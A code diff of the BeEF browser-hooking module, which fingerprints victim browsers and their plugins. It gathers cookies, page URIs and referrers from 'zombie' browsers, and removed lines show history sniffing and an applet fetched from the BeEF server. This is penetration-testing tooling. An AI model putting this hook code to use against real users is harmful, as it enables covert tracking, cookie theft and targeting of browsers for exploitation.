this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16()|| this.isC17() || this.isC18() || this.isC19() || this.isC20() || this.isC21(); - }, - - /** - * Returns true if Opera 9.50 through 9.52. - * @example: beef.browser.isO9_52() - */ - isO9_52: function() { - return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.5/) != null)); - }, - - /** - * Returns true if Opera 9.60 through 9.64. - * @example: beef.browser.isO9_60() - */ - isO9_60: function() { - return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.6/) != null)); - }, - - /** - * Returns true if Opera 10.xx. 
- * @example: beef.browser.isO10() - */ - isO10: function() { - return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.80.*Version\/10\./) != null)); - }, - - /** - * Returns true if Opera 11.xx. - * @example: beef.browser.isO11() - */ - isO11: function() { - return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.80.*Version\/11\./) != null)); - }, - - /** - * Returns true if Opera 12.xx. - * @example: beef.browser.isO12() - */ - isO12: function() { - return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.80.*Version\/12\./) != null)); - }, - - /** - * Returns true if Opera. - * @example: beef.browser.isO() - */ - isO: function() { - return this.isO9_52() || this.isO9_60() || this.isO10() || this.isO11() || this.isO12(); - }, - - /** - * Returns the type of browser being used. - * @example: beef.browser.type().IE6 - * @example: beef.browser.type().FF - * @example: beef.browser.type().O - */ - type: function() { - - return { - C5: this.isC5(), // Chrome 5 - C6: this.isC6(), // Chrome 6 - C7: this.isC7(), // Chrome 7 - C8: this.isC8(), // Chrome 8 - C9: this.isC9(), // Chrome 9 - C10: this.isC10(), // Chrome 10 - C11: this.isC11(), // Chrome 11 - C12: this.isC12(), // Chrome 12 - C13: this.isC13(), // Chrome 13 - C14: this.isC14(), // Chrome 14 - C15: this.isC15(), // Chrome 15 - C16: this.isC16(), // Chrome 16 - C17: this.isC17(), // Chrome 17 - C18: this.isC18(), // Chrome 18 - C19: this.isC19(), // Chrome 19 - C20: this.isC20(), // Chrome 20 - C21: this.isC21(), // Chrome 21 - C: this.isC(), // Chrome any version - - FF2: this.isFF2(), // Firefox 2 - FF3: this.isFF3(), // Firefox 3 - FF3_5: this.isFF3_5(), // Firefox 3.5 - FF3_6: this.isFF3_6(), // Firefox 3.6 - FF4: this.isFF4(), // Firefox 4 - FF5: this.isFF5(), // Firefox 5 - FF6: this.isFF6(), // Firefox 6 - FF7: this.isFF7(), // Firefox 7 - FF8: this.isFF8(), // Firefox 8 - FF9: this.isFF9(), // Firefox 9 - FF10: this.isFF10(), // Firefox 10 - FF11: 
this.isFF11(), // Firefox 11 - FF12: this.isFF12(), // Firefox 12 - FF13: this.isFF13(), // Firefox 13 - FF14: this.isFF14(), // Firefox 14 - FF: this.isFF(), // Firefox any version - - IE6: this.isIE6(), // Internet Explorer 6 - IE7: this.isIE7(), // Internet Explorer 7 - IE8: this.isIE8(), // Internet Explorer 8 - IE9: this.isIE9(), // Internet Explorer 9 - IE: this.isIE(), // Internet Explorer any version - - O9_52: this.isO9_52(), // Opera 9.50 through 9.52 - O9_60: this.isO9_60(), // Opera 9.60 through 9.64 - O10: this.isO10(), // Opera 10.xx - O11: this.isO11(), // Opera 11.xx - O12: this.isO12(), // Opera 11.xx - O: this.isO(), // Opera any version - - S4: this.isS4(), // Safari 4.xx - S5: this.isS5(), // Safari 5.xx - S6: this.isS6(), // Safari 6.x - S: this.isS() // Safari any version - } - }, - - /** - * Returns the type of browser being used. - * @return: {String} User agent software and version. - * - * @example: beef.browser.getBrowserVersion() - */ - getBrowserVersion: function() { - - if (this.isC5()) { return '5' }; // Chrome 5 - if (this.isC6()) { return '6' }; // Chrome 6 - if (this.isC7()) { return '7' }; // Chrome 7 - if (this.isC8()) { return '8' }; // Chrome 8 - if (this.isC9()) { return '9' }; // Chrome 9 - if (this.isC10()) { return '10' }; // Chrome 10 - if (this.isC11()) { return '11' }; // Chrome 11 - if (this.isC12()) { return '12' }; // Chrome 12 - if (this.isC13()) { return '13' }; // Chrome 13 - if (this.isC14()) { return '14' }; // Chrome 14 - if (this.isC15()) { return '15' }; // Chrome 15 - if (this.isC16()) { return '16' }; // Chrome 16 - if (this.isC17()) { return '17' }; // Chrome 17 - if (this.isC18()) { return '18' }; // Chrome 18 - if (this.isC19()) { return '19' }; // Chrome 19 - if (this.isC20()) { return '20' }; // Chrome 20 - if (this.isC21()) { return '21' }; // Chrome 21 - - if (this.isFF2()) { return '2' }; // Firefox 2 - if (this.isFF3()) { return '3' }; // Firefox 3 - if (this.isFF3_5()) { return '3.5'}; // Firefox 
3.5 - if (this.isFF3_6()) { return '3.6'}; // Firefox 3.6 - if (this.isFF4()) { return '4' }; // Firefox 4 - if (this.isFF5()) { return '5' }; // Firefox 5 - if (this.isFF6()) { return '6' }; // Firefox 6 - if (this.isFF7()) { return '7' }; // Firefox 7 - if (this.isFF8()) { return '8' }; // Firefox 8 - if (this.isFF9()) { return '9' }; // Firefox 9 - if (this.isFF10()) { return '10' }; // Firefox 10 - if (this.isFF11()) { return '11' }; // Firefox 11 - if (this.isFF12()) { return '12' }; // Firefox 12 - if (this.isFF13()) { return '13' }; // Firefox 13 - if (this.isFF14()) { return '14' }; // Firefox 14 - - if (this.isIE6()) { return '6' }; // Internet Explorer 6 - if (this.isIE7()) { return '7' }; // Internet Explorer 7 - if (this.isIE8()) { return '8' }; // Internet Explorer 8 - if (this.isIE9()) { return '9' }; // Internet Explorer 9 - - if (this.isS4()) { return '4' }; // Safari 4 - if (this.isS5()) { return '5' }; // Safari 5 - if (this.isS6()) { return '6' }; // Safari 5 - - if (this.isO9_52()) { return '9.5'}; // Opera 9.5x - if (this.isO9_60()) { return '9.6'}; // Opera 9.6 - if (this.isO10()) { return '10' }; // Opera 10.xx - if (this.isO11()) { return '11' }; // Opera 11.xx - if (this.isO12()) { return '12' }; // Opera 12.xx - - return 'UNKNOWN'; // Unknown UA - }, - - /** - * Returns the type of user agent by hooked browser. - * @return: {String} User agent software. - * - * @example: beef.browser.getBrowserName() - */ - getBrowserName: function() { - - if (this.isC()) { return 'C' }; // Chrome any version - if (this.isFF()) { return 'FF'}; // Firefox any version - if (this.isIE()) { return 'IE'}; // Internet Explorer any version - if (this.isO()) { return 'O' }; // Opera any version - if (this.isS()) { return 'S' }; // Safari any version - return 'UN'; // Unknown UA - }, - - /** - * Checks if the zombie has flash installed and enabled. + * Checks if the zombie has the Windows Media Player plugin installed. * @return: {Boolean} true or false. 
* - * @example: if(beef.browser.hasFlash()) { ... } + * @example: if ( beef.browser.hasWMP() ) { ... } */ - hasFlash: function() { - if (!this.type().IE) { - return (navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"]); - } else { - flash_versions = 11; - flash_installed = false; + hasWMP:function () { + + var wmp = false; + + // Not Internet Explorer + if (!this.type().IE) { + + for (i = 0; i < navigator.plugins.length; i++) { + + if (navigator.plugins[i].name.indexOf("Windows Media Player") >= 0) { + wmp = true; + } + + } + + // Internet Explorer + } else { + + try { + + var wmp_test = new ActiveXObject('WMPlayer.OCX'); + + } catch (e) { + beef.debug("Creating WMP ActiveX object failed: "+e.message); + } + + if (wmp_test) { + wmp = true; + } + + } + + return wmp; - if (window.ActiveXObject) { - for (x = 2; x <= flash_versions; x++) { - try { - Flash = eval("new ActiveXObject('ShockwaveFlash.ShockwaveFlash." + x + "');"); - if (Flash) { - flash_installed = true; - } - } - catch(e) { } - } - }; - return flash_installed; - } }, - /** - * Checks if the zombie has Java enabled. - * @return: {Boolean} true or false. + /** + * Checks if VLC is installed + * @return: {Boolean} true or false + **/ + hasVLC:function() { + var vlc = false ; + if(!this.type().IE) { + for (i = 0; i < navigator.plugins.length; i++) { + if (navigator.plugins[i].name.indexOf("VLC") >= 0) { + vlc = true; + } + } + } else { + try { + control = new ActiveXObject("VideoLAN.VLCPlugin.2"); + vlc = true ; + } catch(e) { + beef.debug("Creating VLC ActiveX object failed: "+e.message); + } + } + return vlc; + }, + + /** + * Checks if the zombie has Java enabled. + * @return: {Boolean} true or false. * * @example: if(beef.browser.javaEnabled()) { ... 
} */ - javaEnabled: function() { + javaEnabled:function () { + //Use of deployJava defined in deployJava.js (Oracle java deployment toolkit) + // versionJRE = deployJava.getJREs(); - return (!!window.navigator.javaEnabled()); - - }, + // if(versionJRE != '') + // return true; + // else + return false; - /** - * Checks if the Phonegap API is available from the hooked domain. - * @return: {Boolean} true or false. - * - * @example: if(beef.browser.hasJava()) { ... } - */ - hasPhonegap: function() { - var result = false; - try { if (!!device.phonegap) result = true; else result = false; } - catch(e) { result = false; } - return result; - }, + }, - /** - * Checks if the zombie has Java installed and enabled. - * @return: {Boolean} true or false. - * - * @example: if(beef.browser.hasJava()) { ... } - */ - hasJava: function() { + /** + * Checks if the Phonegap API is available from the hooked domain. + * @return: {Boolean} true or false. + * + * @example: if(beef.browser.hasPhonegap()) { ... } + */ + hasPhonegap:function () { + var result = false; + + try { + if (!!device.phonegap || !!device.cordova) result = true; else result = false; + } + catch (e) { + result = false; + } + return result; + }, - // Check if Java is enabled - if (!beef.browser.javaEnabled()) { - return false; - } + /** + * Checks if the browser supports CORS + * @return: {Boolean} true or false. + * + * @example: if(beef.browser.hasCors()) { ... } + */ + hasCors:function () { + if ('withCredentials' in new XMLHttpRequest()) + return true; + else if (typeof XDomainRequest !== "undefined") + return true; + else + return false; + }, - // This is a temporary fix as this does not work on Safari and Chrome - // Chrome requires manual user intervention even with unsigned applets. - // Safari requires a few seconds to load the applet. - if (beef.browser.isC() || beef.browser.isS()) { - return true; - } + /** + * Checks if the zombie has Java installed and enabled. + * @return: {Boolean} true or false. 
+ * + * @example: if(beef.browser.hasJava()) { ... } + */ + hasJava:function () { - // Inject an unsigned java applet to double check if the Java - // plugin is working fine. - try { - var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/demos/checkJava.jar'; - var applet_id = 'checkJava'; - var applet_name = 'checkJava'; - var output; - beef.dom.attachApplet(applet_id, 'Microsoft_Corporation', 'checkJava' , - null, applet_archive, null); - output = document.Microsoft_Corporation.getInfo(); - beef.dom.detachApplet('checkJava'); - return output = 1; - } catch(e) { - return false; - } - return false; - }, - - /** - * Checks if the zombie has VBScript enabled. - * @return: {Boolean} true or false. - * - * @example: if(beef.browser.hasVBScript()) { ... } - */ - hasVBScript: function() { - if ((navigator.userAgent.indexOf('MSIE') != -1) && (navigator.userAgent.indexOf('Win') != -1)) { - return true; - } else { - return false; - } - }, - - /** - * Returns the list of plugins installed in the browser. - */ - getPlugins: function() { + return beef.browser.javaEnabled(); - var results; - Array.prototype.unique = function() { - var o = {}, i, l = this.length, r = []; - for(i=0; i 0) { - results = new Array(); - for (var i=0; i < navigator.plugins.length; i++) { + /** + * Returns the list of plugins installed in the browser. + */ + getPlugins:function () { - // Firefox returns exact plugin versions - if (beef.browser.isFF()) results[i] = navigator.plugins[i].name + '-v.' + navigator.plugins[i].version; + var results; + Array.prototype.unique = function () { + var o = {}, i, l = this.length, r = []; + for (i = 0; i < l; i += 1) o[this[i]] = this[i]; + for (i in o) r.push(o[i]); + return r; + }; - // Webkit and Presto (Opera) - // Don't support the version attribute - // Sometimes store the version in description (Real, Adobe) - else results[i] = navigator.plugins[i].name;// + '-desc.' 
+ navigator.plugins[i].description; - } - results = results.unique().toString(); + // Internet Explorer + if (this.isIE()) this.getPluginsIE(); - // All browsers that don't support navigator.plugins - } else results = 'navigator.plugins is not supported in this browser!'; + // All other browsers that support navigator.plugins + else if (navigator.plugins && navigator.plugins.length > 0) { + results = new Array(); + for (var i = 0; i < navigator.plugins.length; i++) { - // Return results - return results; - }, - - /** - * Returns a list of plugins detected by IE. This is a hack because IE doesn't - * support navigator.plugins - */ - getPluginsIE: function() { + // Firefox returns exact plugin versions + if (beef.browser.isFF()) results[i] = navigator.plugins[i].name + '-v.' + navigator.plugins[i].version; + + // Webkit and Presto (Opera) + // Don't support the version attribute + // Sometimes store the version in description (Real, Adobe) + else results[i] = navigator.plugins[i].name;// + '-desc.' 
+ navigator.plugins[i].description; + } + results = results.unique().toString(); + + // All browsers that don't support navigator.plugins + } else { + results = new Array(); + //firefox https://bugzilla.mozilla.org/show_bug.cgi?id=757726 + // On linux sistem the "version" slot is empty so I'll attach "description" after version + var plugins = { + + 'AdobeAcrobat':{ + 'control':'Adobe Acrobat', + 'return':function (control) { + try { + version = navigator.plugins["Adobe Acrobat"]["description"]; + return 'Adobe Acrobat Version ' + version; //+ " description "+ filename; + + } + catch (e) { + } + + + }}, + 'Flash':{ + 'control':'Shockwave Flash', + 'return':function (control) { + try { + version = navigator.plugins["Shockwave Flash"]["description"]; + return 'Flash Player Version ' + version; //+ " description "+ filename; + } + + catch (e) { + } + }}, + 'Google_Talk_Plugin_Accelerator':{ + 'control':'Google Talk Plugin Video Accelerator', + 'return':function (control) { + + try { + version = navigator.plugins['Google Talk Plugin Video Accelerator']["description"]; + return 'Google Talk Plugin Video Accelerator Version ' + version; //+ " description "+ filename; + } + catch (e) { + } + }}, + 'Google_Talk_Plugin':{ + 'control':'Google Talk Plugin', + 'return':function (control) { + try { + version = navigator.plugins['Google Talk Plugin']["description"]; + return 'Google Talk Plugin Version ' + version;// " description "+ filename; + } + catch (e) { + } + }}, + 'Facebook_Video_Calling_Plugin':{ + 'control':'Facebook Video Calling Plugin', + 'return':function (control) { + try { + version = navigator.plugins["Facebook Video Calling Plugin"]["description"]; + return 'Facebook Video Calling Plugin Version ' + version;//+ " description "+ filename; + } + catch (e) { + } + }}, + 'Google_Update':{ + 'control':'Google Update', + 'return':function (control) { + try { + version = navigator.plugins["Google Update"]["description"]; + return 'Google Update Version ' + version//+ 
" description "+ filename; + } + catch (e) { + } + }}, + 'Windows_Activation_Technologies':{ + 'control':'Windows Activation Technologies', + 'return':function (control) { + try { + version = navigator.plugins["Windows Activation Technologies"]["description"]; + return 'Windows Activation Technologies Version ' + version;//+ " description "+ filename; + } + catch (e) { + } + + }}, + 'VLC_Web_Plugin':{ + 'control':'VLC Web Plugin', + 'return':function (control) { + try { + version = navigator.plugins["VLC Web Plugin"]["description"]; + return 'VLC Web Plugin Version ' + version;//+ " description "+ filename; + } + catch (e) { + } + }}, + 'Google_Earth_Plugin':{ + 'control':'Google Earth Plugin', + + 'return':function (control) { + try { + version = navigator.plugins['Google Earth Plugin']["description"]; + return 'Google Earth Plugin Version ' + version;//+ " description "+ filename; + } + catch (e) { + } + }}, + 'Silverlight_Plug-In':{ + 'control':'Silverlight Plug-In', + 'return':function (control) { + try { + version = navigator.plugins['Silverlight Plug-In']["description"]; + return 'Silverlight Plug-In Version ' + version;//+ " description "+ filename; + } + catch (e) { + } + }}, + 'FoxitReader_Plugin':{ + 'control':'FoxitReader Plugin', + 'return':function (control) { + try { + version = navigator.plugins['Foxit Reader Plugin for Mozilla']['version']; + return 'FoxitReader Plugin Version ' + version; + } catch (e) { + } + }} + }; + + var c = 0; + for (var i in plugins) { + //each element od plugins + var control = plugins[i]['control']; + try { + var version = plugins[i]['return'](control); + if (version) { + results[c] = version; + c = c + 1; + } + } + catch (e) { + } + + } + } + // Return results + return results; + }, + + /** + * Returns a list of plugins detected by IE. 
This is a hack because IE doesn't + * support navigator.plugins + */ + getPluginsIE:function () { var results = ''; var plugins = {'AdobePDF6':{ - 'control':'PDF.PdfCtrl', - 'return': function(control) { + 'control':'PDF.PdfCtrl', + 'return':function (control) { version = control.getVersions().split(','); version = version[0].split('='); - return 'Acrobat Reader v'+parseFloat(version[1]); - }}, + return 'Acrobat Reader v' + parseFloat(version[1]); + }}, 'AdobePDF7':{ - 'control':'AcroPDF.PDF', - 'return': function(control) { - version = control.getVersions().split(','); - version = version[0].split('='); - return 'Acrobat Reader v'+parseFloat(version[1]); - }}, + 'control':'AcroPDF.PDF', + 'return':function (control) { + version = control.getVersions().split(','); + version = version[0].split('='); + return 'Acrobat Reader v' + parseFloat(version[1]); + }}, 'Flash':{ - 'control':'ShockwaveFlash.ShockwaveFlash', - 'return': function(control) { - version = control.getVariable('$version').substring(4); - return 'Flash Player v'+version.replace(/,/g, "."); - }}, + 'control':'ShockwaveFlash.ShockwaveFlash', + 'return':function (control) { + version = control.getVariable('$version').substring(4); + return 'Flash Player v' + version.replace(/,/g, "."); + }}, 'Quicktime':{ - 'control': 'QuickTime.QuickTime', - 'return': function(control) { - return 'QuickTime Player'; - }}, + 'control':'QuickTime.QuickTime', + 'return':function (control) { + return 'QuickTime Player'; + }}, 'RealPlayer':{ - 'control': 'RealPlayer', - 'return': function(control) { - version = control.getVersionInfo(); - return 'RealPlayer v'+parseFloat(version); - }}, + 'control':'RealPlayer', + 'return':function (control) { + version = control.getVersionInfo(); + return 'RealPlayer v' + parseFloat(version); + }}, 'Shockwave':{ - 'control': 'SWCtl.SWCtl', - 'return': function(control) { - version = control.ShockwaveVersion('').split('r'); - return 'Shockwave v'+parseFloat(version[0]); - }}, - 
'WindowsMediaPlayer': { - 'control': 'WMPlayer.OCX', - 'return': function(control) { - return 'Windows Media Player v'+parseFloat(control.versionInfo); - }} - }; + 'control':'SWCtl.SWCtl', + 'return':function (control) { + version = control.ShockwaveVersion('').split('r'); + return 'Shockwave v' + parseFloat(version[0]); + }}, + 'WindowsMediaPlayer':{ + 'control':'WMPlayer.OCX', + 'return':function (control) { + return 'Windows Media Player v' + parseFloat(control.versionInfo); + }}, + 'FoxitReaderPlugin':{ + 'control':'FoxitReader.FoxitReaderCtl.1', + 'return':function (control) { + return 'Foxit Reader Plugin v' + parseFloat(control.versionInfo); + }} + }; if (window.ActiveXObject) { var j = 0; - for (var i in plugins) - { + for (var i in plugins) { var control = null; var version = null; try { control = new ActiveXObject(plugins[i]['control']); - } catch (e) { } - if (control) - { + } catch (e) { + } + if (control) { if (j != 0) results += ', '; results += plugins[i]['return'](control); 
@@ -774,294 +1682,394 @@ beef.browser = { return results; }, - /** - * Returns zombie screen size and color depth. - */ - getScreenSize: function() { - return { - width: window.screen.width, - height: window.screen.height, - colordepth: window.screen.colorDepth - } - }, + /** + * Returns zombie screen size and color depth. + */ + getScreenSize:function () { + return { + width:window.screen.width, + height:window.screen.height, + colordepth:window.screen.colorDepth + } + }, - /** - * Returns zombie browser window size. - * @from: http://www.howtocreate.co.uk/tutorials/javascript/browserwindow - */ - getWindowSize: function() { - var myWidth = 0, myHeight = 0; - if( typeof( window.innerWidth ) == 'number' ) { - // Non-IE - myWidth = window.innerWidth; - myHeight = window.innerHeight; - } else if( document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight ) ) { - // IE 6+ in 'standards compliant mode' - myWidth = document.documentElement.clientWidth; - myHeight = document.documentElement.clientHeight; - } else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ) { - // IE 4 compatible - myWidth = document.body.clientWidth; - myHeight = document.body.clientHeight; - } - return { - width: myWidth, - height: myHeight - } - }, - - /** - * Construct hash from browser details. This function is used to grab the browser details during the hooking process - */ - getDetails: function() { - var details = new Array(); - - var browser_name = beef.browser.getBrowserName(); - var browser_version = beef.browser.getBrowserVersion(); - var browser_reported_name = beef.browser.getBrowserReportedName(); - var cookies = document.cookie; - var page_title = (document.title) ? document.title : "No Title"; - var page_uri = document.location.href; - var page_referrer = (document.referrer) ? document.referrer : "No Referrer"; - var hostname = document.location.hostname; - var hostport = (document.location.port)? 
document.location.port : "80"; - var browser_plugins = beef.browser.getPlugins(); - var date_stamp = new Date().toString(); - var os_name = beef.os.getName(); - var hw_name = beef.hardware.getName(); - var system_platform = (typeof(navigator.platform) != "undefined" && navigator.platform != "") ? navigator.platform : null; - var browser_type = JSON.stringify(beef.browser.type(), function (key, value) {if (value == true) return value; else if (typeof value == 'object') return value; else return;}); - var screen_size = beef.browser.getScreenSize(); - var window_size = beef.browser.getWindowSize(); - var java_enabled = (beef.browser.javaEnabled())? "Yes" : "No"; - var vbscript_enabled=(beef.browser.hasVBScript())? "Yes" : "No"; - var has_flash = (beef.browser.hasFlash())? "Yes" : "No"; - var has_phonegap = (beef.browser.hasPhonegap())? "Yes" : "No"; - var has_googlegears=(beef.browser.hasGoogleGears())? "Yes":"No"; - var has_web_socket=(beef.browser.hasWebSocket())? "Yes":"No"; - var has_activex = (typeof(window.ActiveXObject) != "undefined") ? "Yes":"No"; - var has_session_cookies = (beef.browser.cookie.hasSessionCookies("cookie"))? "Yes":"No"; - var has_persistent_cookies = (beef.browser.cookie.hasPersistentCookies("cookie"))? "Yes":"No"; + /** + * Returns zombie browser window size. 
+ * @from: http://www.howtocreate.co.uk/tutorials/javascript/browserwindow + */ + getWindowSize:function () { + var myWidth = 0, myHeight = 0; + if (typeof( window.innerWidth ) == 'number') { + // Non-IE + myWidth = window.innerWidth; + myHeight = window.innerHeight; + } else if (document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight )) { + // IE 6+ in 'standards compliant mode' + myWidth = document.documentElement.clientWidth; + myHeight = document.documentElement.clientHeight; + } else if (document.body && ( document.body.clientWidth || document.body.clientHeight )) { + // IE 4 compatible + myWidth = document.body.clientWidth; + myHeight = document.body.clientHeight; + } + return { + width:myWidth, + height:myHeight + } + }, - if(browser_name) details["BrowserName"] = browser_name; - if(browser_version) details["BrowserVersion"] = browser_version; - if(browser_reported_name) details["BrowserReportedName"] = browser_reported_name; - if(cookies) details["Cookies"] = cookies; - if(page_title) details["PageTitle"] = page_title; - if(page_uri) details["PageURI"] = page_uri; - if(page_referrer) details["PageReferrer"] = page_referrer; - if(hostname) details["HostName"] = hostname; - if(hostport) details["HostPort"] = hostport; - if(browser_plugins) details["BrowserPlugins"] = browser_plugins; - if(os_name) details['OsName'] = os_name; - if(hw_name) details['Hardware'] = hw_name; - if(date_stamp) details['DateStamp'] = date_stamp; - if(system_platform) details['SystemPlatform'] = system_platform; - if(browser_type) details['BrowserType'] = browser_type; - if(screen_size) details['ScreenSize'] = screen_size; - if(window_size) details['WindowSize'] = window_size; - if(java_enabled) details['JavaEnabled'] = java_enabled; - if(vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled - if(has_flash) details['HasFlash'] = has_flash - if(has_phonegap) details['HasPhonegap'] = has_phonegap - if(has_web_socket) 
details['HasWebSocket'] = has_web_socket - if(has_googlegears) details['HasGoogleGears'] = has_googlegears - if(has_activex) details['HasActiveX'] = has_activex; - if(has_session_cookies) details["hasSessionCookies"] = has_session_cookies; - if(has_persistent_cookies) details["hasPersistentCookies"] = has_persistent_cookies; + /** + * Construct hash from browser details. This function is used to grab the browser details during the hooking process + */ + getDetails:function () { + var details = new Array(); - return details; - }, - - /** - * Returns array of results, whether or not the target zombie has visited the specified URL - */ - hasVisited: function(urls) { - var results = new Array(); - var iframe = beef.dom.createInvisibleIframe(); - var ifdoc = (iframe.contentDocument) ? iframe.contentDocument : iframe.contentWindow.document; - ifdoc.open(); - ifdoc.write(''); - ifdoc.close(); - urls = urls.split("\n"); - var count = 0; - for (var i in urls) - { - var u = urls[i]; - if (u != "" || u != null) - { - var success = false; - var a = ifdoc.createElement('a'); - a.href = u; - ifdoc.body.appendChild(a); - var width = null; - (a.currentStyle) ? width = a.currentStyle['width'] : width = ifdoc.defaultView.getComputedStyle(a, null).getPropertyValue("width"); - if (width == '0px') { - success = true; - } - results.push({'url':u, 'visited':success}); - count++; - } - } - beef.dom.removeElement(iframe); - if (results.length == 0) - { - return false; - } - return results; - }, + var browser_name = beef.browser.getBrowserName(); + var browser_version = beef.browser.getBrowserVersion(); + var browser_reported_name = beef.browser.getBrowserReportedName(); + var page_title = (document.title) ? document.title : "Unknown"; + var page_uri = (document.location.href) ? document.location.href : "Unknown"; + var page_referrer = (document.referrer) ? document.referrer : "Unknown"; + var hostname = (document.location.hostname) ? 
document.location.hostname : "Unknown"; + var hostport = (document.location.port) ? document.location.port : "80"; + var browser_plugins = beef.browser.getPlugins(); + var date_stamp = new Date().toString(); + var os_name = beef.os.getName(); + var hw_name = beef.hardware.getName(); + var cpu_type = beef.hardware.cpuType(); + var touch_enabled = (beef.hardware.isTouchEnabled()) ? "Yes" : "No"; + var browser_platform = (typeof(navigator.platform) != "undefined" && navigator.platform != "") ? navigator.platform : null; + var browser_type = JSON.stringify(beef.browser.type(), function (key, value) { + if (value == true) return value; else if (typeof value == 'object') return value; else return; + }); + var screen_size = beef.browser.getScreenSize(); + var window_size = beef.browser.getWindowSize(); + var vbscript_enabled = (beef.browser.hasVBScript()) ? "Yes" : "No"; + var has_flash = (beef.browser.hasFlash()) ? "Yes" : "No"; + var has_phonegap = (beef.browser.hasPhonegap()) ? "Yes" : "No"; + var has_googlegears = (beef.browser.hasGoogleGears()) ? "Yes" : "No"; + var has_web_socket = (beef.browser.hasWebSocket()) ? "Yes" : "No"; + var has_webrtc = (beef.browser.hasWebRTC()) ? "Yes" : "No"; + var has_activex = (beef.browser.hasActiveX()) ? "Yes" : "No"; + var has_silverlight = (beef.browser.hasSilverlight()) ? "Yes" : "No"; + var has_quicktime = (beef.browser.hasQuickTime()) ? "Yes" : "No"; + var has_realplayer = (beef.browser.hasRealPlayer()) ? "Yes" : "No"; + var has_wmp = (beef.browser.hasWMP()) ? "Yes" : "No"; + var has_foxit = (beef.browser.hasFoxit()) ? "Yes" : "No"; + try{ + var cookies = document.cookie; + var has_session_cookies = (beef.browser.cookie.hasSessionCookies("cookie")) ? "Yes" : "No"; + var has_persistent_cookies = (beef.browser.cookie.hasPersistentCookies("cookie")) ? 
"Yes" : "No"; + if (cookies) details['Cookies'] = cookies; + if (has_session_cookies) details['hasSessionCookies'] = has_session_cookies; + if (has_persistent_cookies) details['hasPersistentCookies'] = has_persistent_cookies; + }catch(e){ + // the hooked domain is using HttpOnly. EverCookie is persisting the BeEF hook in a different way, + // and there is no reason to read cookies at this point + details['Cookies'] = "Cookies can't be read. The hooked domain is most probably using HttpOnly."; + details['hasSessionCookies'] = "No"; + details['hasPersistentCookies'] = "No"; + } - /** - * Checks if the zombie has Web Sockets enabled. - * @return: {Boolean} true or false. - * In FF6+ the websocket object has been prefixed with Moz, so now it's called MozWebSocket - * */ - hasWebSocket: function() { - if (!!window.WebSocket || !!window.MozWebSocket) return true; else return false; - }, + if (browser_name) details['BrowserName'] = browser_name; + if (browser_version) details['BrowserVersion'] = browser_version; + if (browser_reported_name) details['BrowserReportedName'] = browser_reported_name; + if (page_title) details['PageTitle'] = page_title; + if (page_uri) details['PageURI'] = page_uri; + if (page_referrer) details['PageReferrer'] = page_referrer; + if (hostname) details['HostName'] = hostname; + if (hostport) details['HostPort'] = hostport; + if (browser_plugins) details['BrowserPlugins'] = browser_plugins; + if (os_name) details['OsName'] = os_name; + if (hw_name) details['Hardware'] = hw_name; + if (cpu_type) details['CPU'] = cpu_type; + if (touch_enabled) details['TouchEnabled'] = touch_enabled; + if (date_stamp) details['DateStamp'] = date_stamp; + if (browser_platform) details['BrowserPlatform'] = browser_platform; + if (browser_type) details['BrowserType'] = browser_type; + if (screen_size) details['ScreenSize'] = screen_size; + if (window_size) details['WindowSize'] = window_size; + if (vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled; + if 
(has_flash) details['HasFlash'] = has_flash; + if (has_phonegap) details['HasPhonegap'] = has_phonegap; + if (has_web_socket) details['HasWebSocket'] = has_web_socket; + if (has_googlegears) details['HasGoogleGears'] = has_googlegears; + if (has_webrtc) details['HasWebRTC'] = has_webrtc; + if (has_activex) details['HasActiveX'] = has_activex; + if (has_silverlight) details['HasSilverlight'] = has_silverlight; + if (has_quicktime) details['HasQuickTime'] = has_quicktime; + if (has_realplayer) details['HasRealPlayer'] = has_realplayer; + if (has_wmp) details['HasWMP'] = has_wmp; + if (has_foxit) details['HasFoxit'] = has_foxit; - /** - * Checks if the zombie has Google Gears installed. - * @return: {Boolean} true or false. - * - * @from: https://code.google.com/apis/gears/gears_init.js - * */ - hasGoogleGears: function() { + return details; + }, - var ggfactory = null; + /** + * Returns boolean value depending on whether the browser supports ActiveX + */ + hasActiveX:function () { + return !!window.ActiveXObject; + }, - // Chrome - if (window.google && google.gears) return true; + /** + * Returns boolean value depending on whether the browser supports WebRTC + */ + hasWebRTC:function () { + return (!!window.mozRTCPeerConnection || !!window.webkitRTCPeerConnection); + }, - // Firefox - if (typeof GearsFactory != 'undefined') { - ggfactory = new GearsFactory(); - } else { - // IE - try { - ggfactory = new ActiveXObject('Gears.Factory'); - // IE Mobile on WinCE. 
- if (ggfactory.getBuildInfo().indexOf('ie_mobile') != -1) { - ggfactory.privateSetGlobalObject(this); - } - } catch (e) { - // Safari - if ((typeof navigator.mimeTypes != 'undefined') - && navigator.mimeTypes["application/x-googlegears"]) { - ggfactory = document.createElement("object"); - ggfactory.style.display = "none"; - ggfactory.width = 0; - ggfactory.height = 0; - ggfactory.type = "application/x-googlegears"; - document.documentElement.appendChild(ggfactory); - if(ggfactory && (typeof ggfactory.create == 'undefined')) ggfactory = null; - } - } - } - if (!ggfactory) return false; else return true; - }, + /** + * Returns boolean value depending on whether the browser supports Silverlight + */ + hasSilverlight:function () { + var result = false; - /** - * Dynamically changes the favicon: works in Firefox, Chrome and Opera - **/ - changeFavicon: function(favicon_url) { - var iframe = null; - if (this.isC()) { - iframe = document.createElement('iframe'); - iframe.src = 'about:blank'; - iframe.style.display = 'none'; - document.body.appendChild(iframe); - } - var link = document.createElement('link'), - oldLink = document.getElementById('dynamic-favicon'); - link.id = 'dynamic-favicon'; - link.rel = 'shortcut icon'; - link.href = favicon_url; - if (oldLink) document.head.removeChild(oldLink); - document.head.appendChild(link); - if (this.isC()) iframe.src += ''; - }, + try { + if (beef.browser.isIE()) { + var slControl = new ActiveXObject('AgControl.AgControl'); + result = true; + } else if (navigator.plugins["Silverlight 